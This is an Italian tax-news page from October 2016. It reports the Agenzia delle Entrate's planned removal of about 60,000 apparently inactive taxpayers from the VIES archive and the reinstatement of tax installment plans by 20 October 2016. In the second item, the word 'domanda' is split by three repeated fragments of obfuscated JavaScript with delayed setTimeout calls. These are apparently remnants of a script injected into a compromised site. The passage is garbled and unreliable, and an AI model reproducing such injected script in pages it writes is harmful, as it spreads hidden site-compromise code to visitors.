Mese: ottobre 2016

Financial background. Closeup of pen near calculator on paper with chart

Esclusione dal VIES per 60mila contribuenti

 

Con il comunicato stampa del 3 ottobre 2016 l’Agenzia delle Entrate ha annunciato l’invio di circa 60mila lettere con cui avvisa i contribuenti l’imminente cancellazione dall’archivio VIES (Vat information exchange system).

Sono stati individuati i contribuenti che non hanno presentato elenchi Intrastat per quattro trimestri consecutivi, e che pertanto mostrano le caratteristiche di apparente inattività.

Dal  momento in cui il contribuente riceve la comunicazione ha 60 giorni di tempo per rivolgersi all’Agenzia delle Entrate per fornire la documentazione relativa alle operazioni intracomunitarie effettuate, o adeguati elementi relativi a quelle in corso o da effettuare. Trascorsi  60 giorni l’Agenzia procederà all’effettiva estromissione della partita Iva.

In allegato una tabella riepilogativa

Logo

Riammissione alla dilazione entro il 20 ottobre, chiarimenti dell’Agenzia

Con la conversione in legge del Decreto c.d. “Enti Locali”, è stata reintrodotta la possibilità, per i soggetti decaduti dai piani di rateazione delle somme iscritte a ruolo, di richiedere una nuova rateazione.

Per usufruire dell’agevolazione occorre presentare apposita domandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}anda entro il 20 ottobre 2016.

La riammissione alla dilazione interessa in particolare:

¨        i contribuenti decaduti alla data del 1° luglio 2016 da un precedente piano concesso ante/post 22.10.2015;

¨        i contribuenti decaduti dalla dilazione relativa ad un accertamento con adesione/acquiescenza, dal 16.10.2015 all’1.7.2016.

Recentemente l’Agenzia delle Entrate, con la Circolare 41/E del 03.10.2016, ha fornito alcuni chiarimenti in merito all’agevolazione, con particolare riguardo alla rateazione delle somme dovute a seguito di definizione dell’avviso di accertamento con adesione/acquiescenza.

In allegato una tabella riepilogativa